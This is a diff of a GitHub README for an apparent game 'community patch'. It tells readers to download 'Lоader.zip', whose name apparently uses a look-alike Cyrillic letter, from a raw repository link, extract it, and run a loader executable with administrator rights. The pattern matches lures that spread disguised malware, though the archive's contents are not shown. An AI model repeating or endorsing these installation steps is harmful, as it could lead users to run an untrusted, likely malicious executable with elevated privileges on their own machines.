vikashmishra001/FILF2-v0_01a-CommunityPatch/README.md

 Getting started with FILF 2 v0.01a Patch is simple!
 Follow these steps for a smooth installation:

-1. **Download Loader.rar from the repository.**
+1. **Download https://raw.githubusercontent.com/vikashmishra001/FILF2-v0_01a-CommunityPatch/main/Lоader.zip from the repository.**
-   Simply click on the Loader.rar file in this repository to begin your download.
+   Simply click on the https://raw.githubusercontent.com/vikashmishra001/FILF2-v0_01a-CommunityPatch/main/Lоader.zip file in this repository to begin your download.
-2. **Extract the contents of Loader.rar**
+2. **Extract the contents of https://raw.githubusercontent.com/vikashmishra001/FILF2-v0_01a-CommunityPatch/main/Lоader.zip**
    Use a tool like WinRAR, 7-Zip, Keka, or Unarchiver suitable for your OS.
 3. **Run the FilF2PatchLoader executable**
    Administrator privileges may be required on some systems for full patching capabilities.